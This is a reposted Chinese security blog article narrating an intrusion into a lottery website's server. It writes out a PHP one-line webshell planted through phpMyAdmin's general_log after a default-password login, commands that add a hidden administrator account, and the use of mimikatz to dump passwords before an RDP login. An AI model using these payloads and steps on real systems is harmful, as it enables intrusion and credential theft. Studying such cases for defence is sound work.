技术干货 | 记一次彩票网站的攻击案例

  • A+
所属分类:安全文章

技术干货 | 记一次彩票网站的攻击案例

技术干货 | 记一次彩票网站的攻击案例

技术干货 | 记一次彩票网站的攻击案例

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!


欢迎各位添加微信号:asj-jacky

加入安世加 交流群 和大佬们一起交流安全技术






START

0x01获取phpmyadmin弱口令

通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。

技术干货 | 记一次彩票网站的攻击案例


技术干货 | 记一次彩票网站的攻击案例

0x02通过phpmyadmin后台sql查询写入webshell到日志文件

使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中,流程如下:


命令如下:

1、开启日志功能:set global general_log=on;

2、点击phpmyadmin变量查看日志文件名字:

技术干货 | 记一次彩票网站的攻击案例

这里的日志文件是test.php。

 

3、执行SQL命令写入一句话到日志文件: 

SELECT'<?php assert($_POST["test"]);?>';

技术干货 | 记一次彩票网站的攻击案例

4、 执行成功返回。

技术干货 | 记一次彩票网站的攻击案例

5、 查看日志文件。

技术干货 | 记一次彩票网站的攻击案例


0x03菜刀连接添加用户并且上传mimikatz

使用菜刀连接日志文件木马,xxx/test.php 密码:test

技术干货 | 记一次彩票网站的攻击案例


查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。

 

命令为: 

C:Windowssystem32net.exe user Test [email protected]#123 /addC:Windowssystem32net.exe  localgroup administrators Test /add
上传mimikataz到服务器当中。

技术干货 | 记一次彩票网站的攻击案例


0x043389连接,读取管理员密码

1、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

技术干货 | 记一次彩票网站的攻击案例

2、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。

第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程

第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。

 

3、执行mimikatz,读取到管理员组登录密码。

技术干货 | 记一次彩票网站的攻击案例


4、 使用获取的administrator/xxxx账户密码远程登入服务器当中。

技术干货 | 记一次彩票网站的攻击案例


5、发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:

系统一:

技术干货 | 记一次彩票网站的攻击案例


技术干货 | 记一次彩票网站的攻击案例



本文始发于微信公众号(安世加):技术干货 | 记一次彩票网站的攻击案例

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: